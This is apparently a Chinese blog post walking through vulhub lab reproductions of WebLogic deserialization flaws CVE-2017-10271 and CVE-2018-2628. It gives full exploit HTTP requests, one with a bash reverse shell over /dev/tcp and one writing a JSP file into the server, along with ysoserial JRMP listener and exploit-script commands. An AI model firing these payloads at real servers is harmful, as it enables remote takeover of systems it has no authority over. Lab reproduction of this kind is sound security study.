weblogic反序列化

最新推荐文章于 2024-04-13 13:34:57 发布
最新推荐文章于 2024-04-13 13:34:57 发布
阅读量359 收藏
点赞数 2
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67284865/article/details/131502814
版权

Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)

复现过程为vulhub,具体搭建看:https://blog.csdn.net/qq_56426046/article/details/126805378

漏洞描述

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

影响范围

Oracle WebLogic Server12.2.1.1

Oracle WebLogic Server12.2.1.2

Oracle WebLogic Server12.1.3.0

漏洞原理

<object class="java.lang.ProcessBuilder">	
<void class="java.lang.ProcessBuilder">		 # xml标签中的object 被换成了void,其他不做修改,产生了 CVE-2017-10271 漏洞

第一个是构造一个 Java 对象,这个对象的类型是 java.lang.ProcessBuilder。第二个是对这个对象进行某种操作调用

漏洞复现

显示404
在这里插入图片描述
poc中,void 标签替换了 object标签。burpsuite发送数据包

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.139.10.152:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/10.139.10.152/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

poc解释:

​ 该代码类型为针对 WebLogic Server 的 Web Services Atomic Transaction 漏洞。攻击者在其中通过发送构造的 XML 数据包,使 WebLogic Server 对其产生错误的解析,从而使脚本得以在机器上执行。该脚本的作用是执行 Bash 命令,并生成一个反向 shell 连接到攻击者的 IP 地址和端口。具体来说,攻击者在数据包中嵌入了一段脚本,该脚本会执行 /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/21 0>&1' 命令,该命令创建一个反向 shell 连接,并将 shell 的输入和输出重定向到特定的 IP 地址和端口,以便攻击者可以操纵目标系统并访问其敏感信息。这种攻击方式可以被防火墙和其他网络安全措施所防范。

同时kali监听poc写的8888端口,成功反弹shell
在这里插入图片描述
写webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 10.139.10.152:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.4.0" class="java.beans.XMLDecoder">
    <object class="java.io.PrintWriter"> 
    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
    <void method="println"><string>
    <![CDATA[
<% out.print("passwd"); %>
    ]]>
    </string>
    </void>
    <void method="close"/>
    </object></java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>


 <![CDATA[
<% out.print("passwd"); %>
    ]]>
//这个目前就是个打印测试功能,写shell还不会,以后在研究2023-5-5

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

漏洞描述

​ Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中,并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

影响范围

Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.2
Weblogic 12.2.1.3

漏洞检测

http://10.139.10.152:7001/console/ 代表搭建成功
在这里插入图片描述
下载检查探测该漏洞的脚本:https://github.com/Aedoo/CVE-2018-2628-MultiThreading

然后把url.txt的地址改成目标主机
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CO8zQJQN-1688288837189)(C:\Users\baiyu\AppData\Roaming\Typora\typora-user-images\image-20230505145557641.png)]
开始探测,探测成功

sudo python2 CVE-2018-2628-MultiThreading.py

在这里插入图片描述

漏洞利用

首先下载 ysoserial-cve-2018-2628工具 https://github.com/tdy218/ysoserial-cve-2018-2628/releases

对执行的命令进行需要进行一次编码,因为 Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法
在这里插入图片描述

启动JRMP Server

​ 主要为了使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序

java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener 8888 Jdk7u21 "touch /tmp/success"

以下显示正在监听
在这里插入图片描述
使用exploit.py脚本,向目标Weblogic(http://your-ip:7001)发送数据包 :

exp脚本:https://www.exploit-db.com/exploits/44553

sudo python2 weblogic_exp.py 10.139.10.152 7001 ysoserial-0.1-cve-2018-2628-all.jar 10.139.10.152 8888 JRMPClient

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NHvcL4jt-1688288837191)(C:\Users\baiyu\AppData\Roaming\Typora\typora-user-images\image-20230505165906539.png)]
验证成功:

在该漏洞环境下执行该命令,发现成功写入success
在这里插入图片描述

一坨白大大
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【技术推荐】WebLogic 序列漏洞深入分析
m0_73257876的博客
09-25 3064
WebLogic 漏洞存在较多的序列类和序列的途径,在使用黑名单防御手段下,攻击者只要找到新的序列触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在序列的过程中,就会先序列类 A,之后在填充类 A 的过程中,继续序列类 B,类 B 在序列完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行序列操作就不能饶过黑名单!
weblogic序列漏洞修复
事生谋,谋生计
01-04 583
漏洞验证 1.http://ip:端口/wls-wsat/CoordinatorPortType 2.http://ip:端口/_async/AsyncResponseServiceSoap12 如果页面能访问到,证明存在漏洞。 漏洞修复 解决方法:删除不安全文件 针对漏洞1,如下删除命令: find / -name wls-wsat* rm -rf `find / -name wls-wsat*` 针对漏洞2,如下删除命令: find /wls/bea -name bea_wls9* mv /wl
weblogic序列全版本漏洞利用工具
06-27
weblogic序列全版本漏洞利用工具,可执行命令
【网络安全---漏洞复现】WebLogic 序列漏洞(CVE-2019-2890)漏洞复现
m0_67844671的博客
09-19 1254
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证序列安全。本漏洞绕过了Weblogic序列黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
WebLogic-XMLDecoder(CVE-2017-10271)序列漏洞分析及复现
最新发布
人若无名,便可专心练剑
04-13 1479
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞。复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞的POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
【vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2412
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
Weblogic序列漏洞
wutiangui的博客
09-08 355
war包放置到web目录下之后,可以自动解压,就相当于发布了简单来说,war包是JavaWeb程序打的包,war包里面包括写的代码编译成的class文件,依赖的包,配置文件,所有的网站页面,包括html,jsp等等。浏览器访问http://192.168.25.128:7001/shell/shell.jsp?访问http://ip:7001/hello/file.jsp?shell.jsp,将其压缩为 shell.zip,然后重命名为 shell.war。使用任意读取文件方式获取用户名密码。
【漏洞复现】1. WebLogic 序列漏洞(CVE-2019-2890)复现与分析
Zichel77的博客
03-21 1206
2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证序列安全。本漏洞绕过了Weblogic序列黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。
weblogic预警及历史漏洞
a1b2c3是弱口令
10-17 1209
简介 1、 Oracle WebLogic CVE-2019-2891 漏洞预警 2、WebLogic历史漏洞回顾 1.预警 Oracle 官方发布了 2019 年 10 月的严重补丁更新 CPU(Critical Patch Update),其中修复了存在于 WebLogic 中的一个高危漏洞(CVE-2019-2891)。 1.1预警描述 此漏洞为远程代码执行漏洞,基于全球使用该产品用...
Weblogic XMLDecoder 序列漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 2270
本文介绍了Weblogic XMLDecoder序列相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder序列漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
修复weblogic的JAVA序列漏洞的多种方法--预防GetShell攻击
既是过河之卒,惟有奋力向前。
06-15 1401
0x00 前言 目前oracle还没有在公开途径发布weblogic的JAVA序列漏洞的官方补丁,目前看到的修复方法无非两条: 使用SerialKiller替换进行序列操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉项目里的 “org/apache/commons/collections/functors/InvokerTransformer.cl...
weblogic序列漏洞的初级理解(一)
Redredredfish的博客
08-27 4706
啥是weblogic Weblogic序列漏洞经过了几个阶段,利用技术也有多种变形 从利用方式来看,分为三类 1.直接通过T3协议发送恶意序列对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883) 2.利用T3协议配合RMP或ND接口向发送序列数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14
weblogic序列解决方案
07-26
解决weblogic序列安全问题,文档中有详细的操作步骤,已经验证
oracle weblogic 序列补丁安装步骤
12-19
oracle 序列补丁安装步骤 ,最新补丁的安装方法。
weblogic序列.zip
07-08
简单的日常weblogic 应用的序列漏洞补丁方法和临时整改方法
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic序列远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic序列远程命令执行(CVE-2019-2725)
m0_65150886的博客
12-27 1015
CVE-2019-2725是一个Oracle weblogic序列远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder序列漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。5.将GET改为POST,随后请求包部分除了第一行第二行保留,其他全部替换如下payload。2.可以访问/_async/AsyncResponseService,则存在漏洞。6.使用payload上传jsp木马。1.访问ip:port。1.升级本地JDK环境。4.开启http服务。
weblogic序列介绍及环境搭建
遇事不决冲冲冲
05-08 3640
weblogic是一个常用的web中间件,它的序列漏洞也算是比较经典,而在weblogic里面其实序列漏洞大致分为两种,一个是基于T3协议的序列漏洞,一个是基于XML的序列漏洞,一个原因就是配置环境配了好长时间,这篇就当作专门介绍环境搭建了吧Cve-2017-3506Cve-2017-10271Cve-2019-2729Cve-2019-2725CVE-2015-4852CVE-2016-0638CVE-2016-3510CVE-2017-3248CVE-2018-2628 CVE-20
weblogic序列基本概念
sojrs_sec的博客
12-03 4538
如图,weblogic序列在利用过程中,主要考虑四个部分 Deliver_way :payload通过什么方式传入服务器 Payload:payload是什么格式,xml本身即为序列对象,可直接序列。ysoserial生成的payload,为序列文件 Write object():若非序列数据,则首先经过writeobject()进行序列 Readobject():序列数据...
weblogic序列原理
05-14
WebLogic序列漏洞是指WebLogic服务器在处理Java对象序列时存在漏洞,攻击者可以通过构造恶意的序列数据来执行远程代码。其原理主要包括以下几点: 1. Java对象序列:Java对象序列是将Java对象转换为字节流的过程。Java对象可以通过序列变为字节流,然后通过网络传输或保存到磁盘上。Java对象可以包含变量、方法和类信息等内容。 2. 序列序列是将字节流转换为Java对象的过程。当一个对象被序列之后,它的所有信息都会被保存到一个字节流中。可以通过序列来读取这个字节流,并将其转换为一个Java对象。 3. 恶意序列数据:攻击者可以通过构造恶意的序列数据来执行远程代码。攻击者可以将恶意代码序列到字节流中,并将其发送给WebLogic服务器。当WebLogic服务器序列这个字节流时,就会执行其中的恶意代码,从而实现远程代码执行。 4. 漏洞利用:攻击者可以利用WebLogic序列漏洞来执行远程代码,例如执行系统命令、窃取敏感数据等。攻击者可以通过构造恶意的序列数据来触发漏洞,并执行恶意代码。 总的来说,WebLogic序列漏洞是一种Java序列漏洞,攻击者可以利用该漏洞来执行远程代码,从而实现攻击目标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值